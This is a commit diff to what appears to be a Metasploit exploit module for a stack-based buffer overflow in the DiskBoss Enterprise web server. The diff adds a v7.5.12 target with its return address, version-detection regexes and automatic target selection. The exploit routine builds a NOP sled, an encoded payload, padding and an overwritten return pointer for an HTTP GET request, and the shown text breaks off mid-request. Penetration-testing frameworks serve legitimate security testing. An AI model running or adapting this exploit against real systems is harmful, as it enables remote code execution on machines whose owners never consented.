Add automatic targeting

2017-01-08 11:23:18 +01:00 · 2017-01-08 11:23:18 +01:00 · 9162374ae3
parent d2472712f3
commit 9162374ae3
1 changed files with 46 additions and 8 deletions
--- a/modules/exploits/windows/http/diskboss_get_bof.rb
+++ b/modules/exploits/windows/http/diskboss_get_bof.rb
@ -16,10 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'DiskBoss Enterprise GET Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of DiskBoss Enterprise v7.4.28, caused by
-        improper bounds checking of the request path in HTTP GET requests
-        sent to the built-in web server. This module has been tested
-        successfully on Windows XP SP3 and Windows 7 SP1.
+        in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
+        caused by improper bounds checking of the request path in HTTP GET
+        requests sent to the built-in web server. This module has been
+        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
@ -43,10 +43,21 @@ class MetasploitModule < Msf::Exploit::Remote
        },
      'Targets'        =>
        [
+          ['Automatic Targeting',
+            {
+              'auto' => true
+            }
+          ],
          [ 'DiskBoss Enterprise v7.4.28',
            {
              'Offset' => 2471,
-              'Ret'    => 0x1004605c  # ADD ESP,0x68 # RETN [Lgi.dll]
+              'Ret'    => 0x1004605c  # ADD ESP,0x68 # RETN [libpal.dll]
+            }
+          ],
+          [ 'DiskBoss Enterprise v7.5.12',
+            {
+              'Offset' => 2471,
+              'Ret'    => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ]
        ],
@ -63,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
    })

    if res && res.code == 200
-      if res.body =~ /DiskBoss Enterprise v7\.4\.28/
+      if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /DiskBoss Enterprise/
        return Exploit::CheckCode::Detected
@ -77,10 +88,37 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
+    mytarget = target
+
+    if (target['auto'])
+      mytarget = nil
+
+      print_status("Automatically detecting the target...")
+
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => '/'
+      })
+
+      if res && res.code == 200
+        if res.body =~ /DiskBoss Enterprise v7\.4\.28/
+          mytarget = targets[1]
+        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
+          mytarget = targets[2]
+        end
+      end
+
+      if (not mytarget)
+        fail_with(Failure::NoTarget, "No matching target")
+      end
+
+      print_status("Selected Target: #{mytarget.name}")
+    end
+
    sploit =  make_nops(21)
    sploit << payload.encoded
-    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
-    sploit << [target.ret].pack('V')
+    sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+    sploit << [mytarget.ret].pack('V')
    sploit << rand_text_alpha(2500)

    res = send_request_cgi({